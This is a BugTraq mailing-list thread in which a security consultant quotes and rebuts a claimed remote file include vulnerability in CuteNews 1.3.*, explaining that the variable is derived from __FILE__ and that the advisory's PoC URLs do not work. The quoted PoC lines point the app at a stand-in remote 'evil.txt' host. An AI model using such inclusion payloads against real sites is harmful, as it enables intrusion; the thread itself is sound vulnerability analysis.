BugTraq
CuteNews 1.3.* Remote File Include Vulnerability Aug 25 2006 07:14PM
stormhacker hotmail com (2 replies)
Re: CuteNews 1.3.* Remote File Include Vulnerability Sep 02 2006 07:46PM
satalin (satalin gmail com)
Re: CuteNews 1.3.* Remote File Include Vulnerability Aug 29 2006 10:12PM
Carsten Eilers (ceilers-lists gmx de)
Hi,

stormhacker (at) hotmail (dot) com [email concealed] schrieb am Fri, 25 Aug 2006 19:14:46 +0000:

>Vendor: CuteNews 1.3.*
>
>-----------------Description---------------
>
>
>$cutepath = __FILE__;

Here $cutepath is set to the path of this script

>$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
>
>$cutepath = preg_replace( "'/search\.php'", "", $cutepath);

Now the name of the script, search.php, is removed.
As result $cutepath contains the patch to the directory
of search.php...

>require_once("$cutepath/inc/functions.inc.php");

...from where inc/functions.inc.php is included.
Same for show_news.php.
So where is a vulnerability?

>--------------PoC/Exploit----------------------
>
>
>show_news.php?cutepath=http://host/evil.txt?
>
>search.php?cutepath=http://host/evil.txt?

They don't work

>--------------Solution---------------------
>
>
>No Patch available.

No patch necessary.

>--------------Credit-----------------------
>
>
>Discovered by: rUnViRuS (worlddefacers.de)

Credit for what? A non-existing vulnerability?
OK: Applaus, applaus, applaus... ;-)

Regards
Carsten

--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

<http://www.ceilers-it.de>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus